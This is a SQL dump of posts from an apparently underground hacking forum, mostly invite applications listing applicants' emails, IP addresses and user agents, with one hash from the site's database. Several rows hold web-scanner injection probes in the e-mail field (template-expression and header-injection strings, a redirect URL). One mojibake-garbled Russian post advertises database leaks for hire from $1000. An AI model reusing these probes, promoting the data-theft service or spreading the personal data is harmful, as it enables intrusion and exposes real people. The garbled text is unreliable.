(1692, 1510, 0, 'Invite', 2, '{$name}', 1408471519, '[SIZE=\'4\'][COLOR=\'Sienna\']Trigger[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: trigger@inbox.im\n[b]e-mail[/b]: trigger@inbox.im\n[b]Info[/b]: I want to learn about computers and security\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.59.103.153\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://trigger.io | trigger.io \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1694, 1511, 0, 'Invite', 2, '{$name}', 1408478104, '[SIZE=\'4\'][COLOR=\'Sienna\']BX1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: bodi.crazy1@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.110.142.76\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1695, 1512, 0, 'Invite', 2, '{$name}', 1408481017, '[SIZE=\'4\'][COLOR=\'Sienna\']Dark.Dragon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dar.dragon@jabbim.cz\n[b]e-mail[/b]: red.dragon.alpha@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.144.191.253\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/darkdragon | https://twitter.com/hashtag/darkdragon \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1696, 1513, 0, 'Invite', 2, '{$name}', 1408483706, '[SIZE=\'4\'][COLOR=\'Sienna\']blackman07[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: scriptkid92@jabber.org\n[b]e-mail[/b]: jadeix92@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.203.67.130\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.flickr.com/photos/dannhann/425281634/ | http://www.flickr.com/photos/dannhann/425281634/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1698, 1515, 0, 'Invite', 2, '{$name}', 1408491481, '[SIZE=\'4\'][COLOR=\'Sienna\']hoobie[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: maltivera@hackyard.net\n[b]e-mail[/b]: punkrocker11@operamail.com\n[b]Info[/b]: https://hackyard.net/forum/member.php?u=940\r\nhttps://trojanforge.co/member.php/77-whatsahoober\r\nhttps://exploit.in/forum/index.php?showuser=52011\r\nhttp://i25c62nvu4cgeqyz.onion/profile.php?id=255\r\n\r\nAchievements: software tester/developer\r\n\r\nknowledge: lua, perl, php, javascript, java applets, html, css, regex, reversing and analyzing malware.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 216.164.19.30\n[*][b]real ip[/b]: 216.164.19.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; Windows NT 6.3; I; WOW64; IA64; en) AppleWebKit/599.0+ (KHTML, like Gecko) Chrome/38.0.2066.0 Maxthon/3.9 QupZilla/1.6.6\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://hoobie.net | hoobie.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1714, 1530, 0, 'Invite', 2, '{$name}', 1408519994, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: \nns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1715, 1531, 0, 'Invite', 2, '{$name}', 1408520005, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: hTTp://r87.com/n\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1713, 1529, 0, 'Invite', 2, '{$name}', 1408519987, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1701, 1518, 0, 'opium', 24, 'принимаю заказы на слив бд', 1408500220, '[B]ÞñÑÂ÷ðтõûьýыõ уÑÂûþòøÑÂ:[/B]\n[LIST]\n[*]цõýð ò÷ûþüð þт 1000$\n[*] õÑÂûø ñð÷ы ûøúòøôýыõ (ôðтøýó, фðрüð, ôöþñ ø Ñ‚.ô.), тþ цõýýøú рðÑÂтõт ѠрþÑÂтþü þñъõüð. ÃÂþ ò ûюñþü ÑÂûучðõ ôþóþòþрøüÑÂÑÂ.\n[/LIST]\n [COLOR=\"green\"]ÞñрðщðтьÑÂѠò ôöðññõр: [email]kapitoshka@xakepy.ru[/email][/COLOR]\n\n[B]áþтруôýøчõÑÂтòþ:[/B]\n[LIST]\n[*]ÕÑÂûø òы øüõõтõ ñðó øûø уüõõтõ ñыÑÂтрþ ýðхþôøть ø üýþóþ, ÿþûь÷þòðтьÑÂÑ ÑÂþфтþü\n[*] ÃÂõ üþöõтõ рðÑÂúрутøть øûø \"ôþñøть\" ò ôðýýþü úþýúрõтýþü ÑÂûучðõ,\n[/LIST] тðú öõ - þñрðщðùтõÑÂÑŒ. Ãâ€Ã¾Ã³Ã¾Ã²Ã¾Ñ€Ã¸Ã¼ÑÂѠþ ÑÂþтруôýøчõÑÂтòõ.\n\n[COLOR=\"green\"] ôöðññõр: [email]kapitoshka@xakepy.ru[/email][/COLOR]', 1, 0, '', 4, 1, 0, 0, 0),
(1712, 1528, 0, 'Invite', 2, '{$name}', 1408519981, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: http://example.com/?\r\nns: netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1711, 1527, 0, 'Invite', 2, '{$name}', 1408519970, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: \r\nns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1710, 1526, 0, 'Invite', 2, '{$name}', 1408519960, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: #{28274*28274-(13)}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1709, 1525, 0, 'Invite', 2, '{$name}', 1408519942, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ${28275*28275-(13)}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1707, 1083, 1597, 'kx00', 6, '', 1408507998, 'ßрøòõт Ñøр рðô чтþ ты Ѡýðüø. \r\nÒþÿрþÑÂ. Úтþ ýøть ÿþхõúðû [url]http://toranoana.jp?[/url]', 1, 1, '', 0, 1, 0, 0, 0),
(1708, 1524, 0, 'Invite', 2, '{$name}', 1408516070, '[SIZE=\'4\'][COLOR=\'Sienna\']lolfdsf[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qcffvds@live.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 114.150.218.7\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/F464\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://robloxxxxi.blogspot.com/.../all-absurd-malls-at-roblox-are.html | http://robloxxxxi.blogspot.com/.../all-absurd-malls-at-roblox-are.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1716, 1532, 0, 'Invite', 2, '{$name}', 1408521565, '[SIZE=\'4\'][COLOR=\'Sienna\']ybo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: nothing@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.45.72.104\n[*][b]real ip[/b]: 176.45.72.104\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1717, 1533, 0, 'Invite', 2, '{$name}', 1408522520, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1718, 1534, 0, 'Invite', 2, '{$name}', 1408523662, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1719, 1535, 0, 'Invite', 2, '{$name}', 1408523768, '[SIZE=\'4\'][COLOR=\'Sienna\']ddddddd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 158.255.211.156\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : ddddddd : se_m_ja@wp.pl : 212.76.62.149 : 94359a18e14e99698cc7e969bde40b08\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In 